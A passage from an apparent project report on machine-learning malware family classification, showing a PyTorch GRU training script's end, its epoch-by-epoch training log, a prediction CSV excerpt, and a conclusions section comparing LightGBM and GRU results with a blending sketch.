                total += labels.size(0)
        return epoch_loss / total, correct / total

    # Train, keeping the checkpoint with the lowest validation loss
    best_val_loss = float('inf')
    for epoch in range(EPOCHS):
        print(f"\nEpoch {epoch + 1}/{EPOCHS}")
        train_loss, train_acc = train_epoch(model, train_loader, criterion, optimizer)
        val_loss, val_acc = validate_epoch(model, val_loader, criterion)
        print(f"Train Loss: {train_loss:.4f}, Train Accuracy: {train_acc:.4f}")
        print(f"Validation Loss: {val_loss:.4f}, Validation Accuracy: {val_acc:.4f}")
        if val_loss < best_val_loss:
            best_val_loss = val_loss
            torch.save(model.state_dict(), MODEL_PATH)
            print(f"Model saved at {MODEL_PATH}!")

# Predict on the test set
model.eval()
test_preds = []
with torch.no_grad():
    for sequences in tqdm(test_loader, desc="Testing"):
        sequences = sequences.to(DEVICE)
        outputs = model(sequences)
        preds = torch.softmax(outputs, dim=1).cpu().numpy()
        test_preds.append(preds)

test_preds = np.concatenate(test_preds, axis=0)

# Build the submission file
sub = pd.DataFrame()
sub['file_id'] = te['file_id']  # file_id column from the test set

# Fill in the predicted probability for each class
for i in range(NUM_CLASSES):
    sub[f'prob{i}'] = test_preds[:, i]

# Save the submission
sub.to_csv('pytorch_gru_submission.csv', index=False)
print("预测完成并保存至 pytorch_gru_submission.csv")

PS D:\chen_hao\病毒检测机器学习> & D:/ProgramSoftware/anaconda3/python.exe d:/chen_hao/病毒检测机器学习/RNN.py
Using device: cuda

Epoch 1/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:32<00:00, 1.35it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.01it/s]
Train Loss: 1.6978, Train Accuracy: 0.4272
Validation Loss: 1.5224, Validation Accuracy: 0.4460
Model saved!

Epoch 2/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:27<00:00, 1.59it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.01it/s]
Train Loss: 1.5041, Train Accuracy: 0.4547
Validation Loss: 1.5046, Validation Accuracy: 0.4471
Model saved!

Epoch 3/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:29<00:00, 1.51it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 1.4797, Train Accuracy: 0.4620
Validation Loss: 1.4927, Validation Accuracy: 0.4489
Model saved!

Epoch 4/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.56it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 1.4648, Train Accuracy: 0.4689
Validation Loss: 1.4740, Validation Accuracy: 0.4633
Model saved!

Epoch 5/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:27<00:00, 1.58it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 1.4373, Train Accuracy: 0.4820
Validation Loss: 1.4314, Validation Accuracy: 0.4924
Model saved!

Epoch 6/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:27<00:00, 1.59it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.01it/s]
Train Loss: 1.4187, Train Accuracy: 0.4918
Validation Loss: 1.3496, Validation Accuracy: 0.5169
Model saved!

Epoch 7/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.57it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 1.4115, Train Accuracy: 0.5090
Validation Loss: 1.3058, Validation Accuracy: 0.5504
Model saved!

Epoch 8/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.57it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.00it/s]
Train Loss: 1.1772, Train Accuracy: 0.6115
Validation Loss: 1.0737, Validation Accuracy: 0.6267
Model saved!

Epoch 9/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 1.0006, Train Accuracy: 0.6609
Validation Loss: 0.9820, Validation Accuracy: 0.6598
Model saved!

Epoch 10/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.9129, Train Accuracy: 0.6887
Validation Loss: 0.9084, Validation Accuracy: 0.6749
Model saved!

Epoch 11/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.8453, Train Accuracy: 0.7069
Validation Loss: 0.8542, Validation Accuracy: 0.7030
Model saved!

Epoch 12/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.7822, Train Accuracy: 0.7422
Validation Loss: 0.7674, Validation Accuracy: 0.7520
Model saved!

Epoch 13/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.7204, Train Accuracy: 0.7704
Validation Loss: 0.7360, Validation Accuracy: 0.7639
Model saved!

Epoch 14/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.7144, Train Accuracy: 0.7717
Validation Loss: 0.7184, Validation Accuracy: 0.7664
Model saved!

Epoch 15/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.02it/s]
Train Loss: 0.6625, Train Accuracy: 0.7878
Validation Loss: 0.6925, Validation Accuracy: 0.7721
Model saved!

Epoch 16/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.54it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.6390, Train Accuracy: 0.7931
Validation Loss: 0.6748, Validation Accuracy: 0.7815
Model saved!

Epoch 17/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.6061, Train Accuracy: 0.8033
Validation Loss: 0.6415, Validation Accuracy: 0.7927
Model saved!

Epoch 18/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.00it/s]
Train Loss: 0.5665, Train Accuracy: 0.8278
Validation Loss: 0.5947, Validation Accuracy: 0.8279
Model saved!

Epoch 19/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.53it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.02it/s]
Train Loss: 0.5263, Train Accuracy: 0.8396
Validation Loss: 0.5656, Validation Accuracy: 0.8287
Model saved!

Epoch 20/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.52it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.5044, Train Accuracy: 0.8467
Validation Loss: 0.5578, Validation Accuracy: 0.8366
Model saved!
d:\chen_hao\病毒检测机器学习\RNN.py:146: FutureWarning: You are using `torch.load` with `weights_only=False` (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for `weights_only` will be flipped to `True`. This limits the functions that could be executed during unpickling. Arbitrary objects will no longer be allowed to be loaded via this mode unless they are explicitly allowlisted by the user via `torch.serialization.add_safe_globals`. We recommend you start setting `weights_only=True` for any use case where you don't have full control of the loaded file. Please open an issue on GitHub for any issues related to this experimental feature.
model.load_state_dict(torch.load('best_gru_model.pth'))
Testing: 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 51/51 [00:25<00:00, 2.01it/s]
预测完成并保存至 pytorch_gru_submission.csv
PS D:\chen_hao\病毒检测机器学习>
pytorch_gru_submission.csv (excerpt):
file_id,prob0,prob1,prob2,prob3,prob4,prob5,prob6,prob7
1,0.06448878,0.002397979,0.9028775,0.0013381493,0.00045697886,0.0020659335,0.003058874,0.023315739
2,0.9813138,8.656157e-05,0.0029583538,0.0011351788,0.00028997194,0.006586187,0.0018473516,0.005782577
3,0.99163276,5.5359196e-05,0.0027402057,0.0004632939,0.000118531985,0.0013870831,0.00072588393,0.0028768326
4,0.021272896,0.011765718,0.024904,0.076123476,0.015064285,0.025066515,0.17768894,0.6481142
5,0.904939,0.00073774875,0.04147379,0.002916103,0.0005452043,0.0022994527,0.007011477,0.040077265
6,0.0021798164,0.0007873667,0.0014384006,0.0027823928,0.00244751,0.9728891,0.011387657,0.006087801
7,0.0068255765,0.017928587,0.0011721165,0.5918627,0.028887965,0.08608816,0.065764345,0.20147054
8,0.256366,0.00392755,0.17083807,0.03653748,0.0030841657,0.014288423,0.043775067,0.4711833
9,0.036793254,0.010180762,0.07269347,0.028041216,0.007907337,0.014224959,0.1945642,0.6355948
10,0.25146127,0.0009808545,0.0032455756,0.375254,0.008948095,0.1938656,0.042228147,0.124016486
11,0.00095530774,0.09089262,0.001956982,0.0021283366,0.0098222485,0.88708365,0.004995707,0.0021652123
12,0.9000948,0.00055806845,0.07364376,0.0017178208,0.00039910257,0.0030469508,0.0031312718,0.017408215
13,0.9858329,7.062489e-05,0.002319975,0.00074456446,0.00021577052,0.0051714894,0.0013318722,0.0043128696
14,0.71485704,0.0018635483,0.1835684,0.0046869554,0.00093834405,0.0039504743,0.012158039,0.07797725
15,0.95209205,0.00034266696,0.024804827,0.0013410876,0.00033840715,0.002777113,0.0031649894,0.015138777
16,0.9988642,6.826462e-05,0.0005704778,5.0490657e-05,5.821846e-05,1.5237126e-05,5.5164932e-05,0.00031797035
17,0.00090827956,0.0009387416,0.0012451294,0.00543124,0.003330927,0.96512026,0.014691722,0.008333769
18,0.01809039,0.0010136849,0.0009486259,0.55183834,0.017171165,0.17679921,0.012343813,0.22179477
19,0.9777029,0.00014269094,0.0092709325,0.0011368245,0.000268385,0.003403238,0.0015272632,0.006547669
20,0.9926167,4.7670434e-05,0.002156556,0.00042129072,0.000109387,0.0013140069,0.0006860488,0.0026483978
21,0.9420716,0.00025259246,0.010330827,0.0035953792,0.0003313114,0.013363041,0.002719807,0.027335435
22,0.010564044,0.013456773,0.013810868,0.10937901,0.023766087,0.07066154,0.2242378,0.53412384
23,0.0074043795,0.0237848,0.8829586,0.016059525,0.012664877,0.015524606,0.0027832955,0.03881999
24,0.7460677,0.0016432973,0.16402717,0.0043358603,0.0008404788,0.003432122,0.010673889,0.06897949

Summary and Outlook

  1. Conclusions
    • Ransomware: a simple ransomware demo was built, exposing the mechanics of file encryption and decryption.
    • Machine learning: LightGBM on TF-IDF features performed strongly (90.24% mean cross-validation accuracy) and suits fast detection.
    • Deep learning: the GRU model works directly on raw API call sequences and captures complex sequential behavior (83.66% validation accuracy), making it a promising basis for further research.
  2. Future work
    • Add attention mechanisms to strengthen the deep model's understanding of sequence data.
    • Use data augmentation to diversify the training set and improve generalization.
    • Fuse the machine-learning and deep-learning predictions to push detection and classification further (a minimal blending sketch follows this list).
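As a starting point for such fusion, the two submissions produced above can be blended directly. A minimal sketch with hypothetical, untuned weights; note the two files use different column conventions (prob_0 ... vs prob0 ...), and rows are aligned by file_id:

import pandas as pd

# Blend the class probabilities of the LightGBM and GRU submissions.
lgbm = pd.read_csv('submission.csv')
gru = pd.read_csv('pytorch_gru_submission.csv')

merged = lgbm.merge(gru, on='file_id')  # align rows by file_id
W_LGBM, W_GRU = 0.6, 0.4                # hypothetical weights; tune on validation data

blend = pd.DataFrame({'file_id': merged['file_id']})
for i in range(8):
    blend[f'prob{i}'] = W_LGBM * merged[f'prob_{i}'] + W_GRU * merged[f'prob{i}']

blend.to_csv('blend_submission.csv', index=False)

Whether blending helps should be verified against the LogLoss metric on held-out data before submission.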